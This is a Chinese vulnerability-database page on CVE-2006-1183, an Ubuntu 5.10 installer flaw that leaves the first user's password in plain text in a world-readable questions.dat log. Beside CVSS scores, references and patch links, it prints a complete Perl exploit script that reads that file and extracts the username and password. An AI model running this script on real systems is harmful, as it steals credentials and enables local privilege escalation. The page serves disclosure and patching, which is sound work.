CVE-2006-1183
CVSS7.2
发布时间 :2006-03-13 07:18:00
修订时间 :2011-03-07 21:32:20
NMCOES    

[原文]The Ubuntu 5.10 installer does not properly clear passwords from the installer log file (questions.dat), and leaves the log file with world-readable permissions, which allows local users to gain privileges.


[CNNVD]Ubuntu Linux本地安装口令泄露漏洞(CNNVD-200603-221)

        Ubuntu 5.10安装器没有妥善从安装器记录文件(questions.dat)中清除掉口令,留下一个全域可读的记录文件,从而本地用户可取得特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1183
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1183
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-221
(官方数据源) CNNVD

- 其它链接及资源

http://www.ubuntulinux.org/support/documentation/usn/usn-262-1
(PATCH)  UBUNTU  USN-262-1
https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606
(UNKNOWN)  CONFIRM  https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606
http://www.vupen.com/english/advisories/2006/0927
(UNKNOWN)  VUPEN  ADV-2006-0927
http://xforce.iss.net/xforce/xfdb/25170
(UNKNOWN)  XF  ubuntu-installer-password-disclosure(25170)
http://www.securityfocus.com/bid/17086
(UNKNOWN)  BID  17086
http://www.osvdb.org/23868
(UNKNOWN)  OSVDB  23868
http://securitytracker.com/id?1015761
(UNKNOWN)  SECTRACK  1015761
http://secunia.com/advisories/19200
(UNKNOWN)  SECUNIA  19200

- 漏洞信息

Ubuntu Linux本地安装口令泄露漏洞
高危 设计错误
2006-03-13 00:00:00 2006-03-13 00:00:00
本地  
        Ubuntu 5.10安装器没有妥善从安装器记录文件(questions.dat)中清除掉口令,留下一个全域可读的记录文件,从而本地用户可取得特权。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Ubuntu Ubuntu Linux 5.10 amd64
        Ubuntu initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/initial-passwd-ud eb_4.0.3-37ubuntu8_all.udeb
        Ubuntu login_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubu ntu8_amd64.deb
        Ubuntu login_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubu ntu8_i386.deb
        Ubuntu login_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubu ntu8_powerpc.deb
        Ubuntu passwd_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ub untu8_amd64.deb
        Ubuntu passwd_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ub untu8_i386.deb
        Ubuntu passwd_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ub untu8_powerpc.deb
        Ubuntu Ubuntu Linux 5.10 powerpc
        Ubuntu initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/initial-passwd-ud eb_4.0.3-37ubuntu8_all.udeb
        Ubuntu login_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubu ntu8_amd64.deb
        Ubuntu login_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubu ntu8_i386.deb
        Ubuntu login_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubu ntu8_powerpc.deb
        Ubuntu passwd_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ub untu8_amd64.deb
        Ubuntu passwd_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ub untu8_i386.deb
        Ubuntu passwd_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ub untu8_powerpc.deb
        Ubuntu Ubuntu Linux 5.10 i386
        Ubuntu initial-passwd-udeb_4.0.3-37ubuntu8_all.udeb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/initial-passwd-ud eb_4.0.3-37ubuntu8_all.udeb
        Ubuntu login_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubu ntu8_amd64.deb
        Ubuntu login_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubu ntu8_i386.deb
        Ubuntu login_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/login_4.0.3-37ubu ntu8_powerpc.deb
        Ubuntu passwd_4.0.3-37ubuntu8_amd64.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ub untu8_amd64.deb
        Ubuntu passwd_4.0.3-37ubuntu8_i386.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ub untu8_i386.deb
        Ubuntu passwd_4.0.3-37ubuntu8_powerpc.deb
        Ubuntu 5.10 (Breezy Badger)
        http://security.ubuntu.com/ubuntu/pool/main/s/shadow/passwd_4.0.3-37ub untu8_powerpc.deb
        

- 漏洞信息 (1579)

Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability (EDBID:1579)
linux local
2006-03-12 Verified
0 Kristian Hermansen
N/A [点击下载]
#!/usr/bin/perl -w

use warnings;
use strict;

##############################################################################
# Author: Kristian Hermansen
# Date: 3/12/2006
# Overview: Ubuntu Breezy stores the installation password in plain text
# Link: https://launchpad.net/distros/ubuntu/+source/shadow/+bug/34606
##############################################################################

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "Kristian Hermansen's 'Eazy Breezy' Password Recovery Tool\n";
print "99% effective, thank your local admin ;-)\n";
print "FOR EDUCATIONAL PURPOSES ONLY!!!\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n";

# the two vulnerable files
my $file1 = "/var/log/installer/cdebconf/questions.dat";
my $file2 = "/var/log/debian-installer/cdebconf/questions.dat";

print "Checking if an exploitable file exists...";
if ( (-e $file1) || (-e $file2) )
{ 
  print "Yes\nNow checking if readable...";
  if ( -r $file1 )
  {
    getinfo($file1);
  }
  else
  {
    if ( -r $file2 ) {
      getinfo($file2);
    }
    else {
      print "No\nAdmin may have changed the permissions on the files :-(\nExiting...\n";
      exit(-2);
    }
  }
}
else
{
  print "No\nFile may have been deleted by the administrator :-(\nExiting...\n";
  exit(-1);
}

sub getinfo {
  my $fn = shift;
  print "Yes\nHere come the details...\n\n";
  my $realname = `grep -A 1 "Template: passwd/user-fullname" $fn | grep "Value: " | sed 's/Value: //'`;
  my $user = `grep -A 1 "Template: passwd/username" $fn | grep "Value: " | sed 's/Value: //'`;
  my $pass = `grep -A 1 "Template: passwd/user-password-again" $fn | grep "Value: " | sed 's/Value: //'`;
  chomp($realname);
  chomp($user);
  chomp($pass);
  print "Real Name: $realname\n";
  print "Username: $user\n";
  print "Password: $pass\n";
}

# milw0rm.com [2006-03-12]
		

- 漏洞信息

23868
Ubuntu Installer Log File Cleartext Password Disclosure
Local Access Required Cryptographic, Information Disclosure
Loss of Confidentiality
Exploit Public, Exploit Commercial

- 漏洞描述

The Ubunto installer contains a flaw that may lead to an unauthorized password exposure. The installer log files fail to sanitize passwords used during the installation. The installer log files are world-readable, thus any local user can see the password of the first user account, which has full sudo privileges by default, thus leading to a loss of confidentiality.

- 时间线

2006-03-12 Unknow
2006-03-12 Unknow

- 解决方案

Upgrade package base-config to version 2.67ubuntu20 and passwd to version 1:4.0.3-37ubuntu8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Ubuntu Linux Local Installation Password Disclosure Vulnerability
Design Error 17086
No Yes
2006-03-12 12:00:00 2007-11-01 07:36:00
Discovered by Karl

- 受影响的程序版本

Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64

- 漏洞讨论

Ubuntu Linux is prone to a local password-disclosure vulnerability because the installation system improperly store clear-text passwords in world-readable files.

Exploiting this issue allows local attackers to access the user account that was created during the initial installation of Ubuntu. Since this user is granted 'sudo' access to the superuser account, this potentially allows local attackers to completely compromise affected computers.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

The vendor has released an advisory along with fixes to address this issue. Please see the advisory for more information.


Ubuntu Ubuntu Linux 5.10 amd64

Ubuntu Ubuntu Linux 5.10 powerpc

Ubuntu Ubuntu Linux 5.10 i386

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站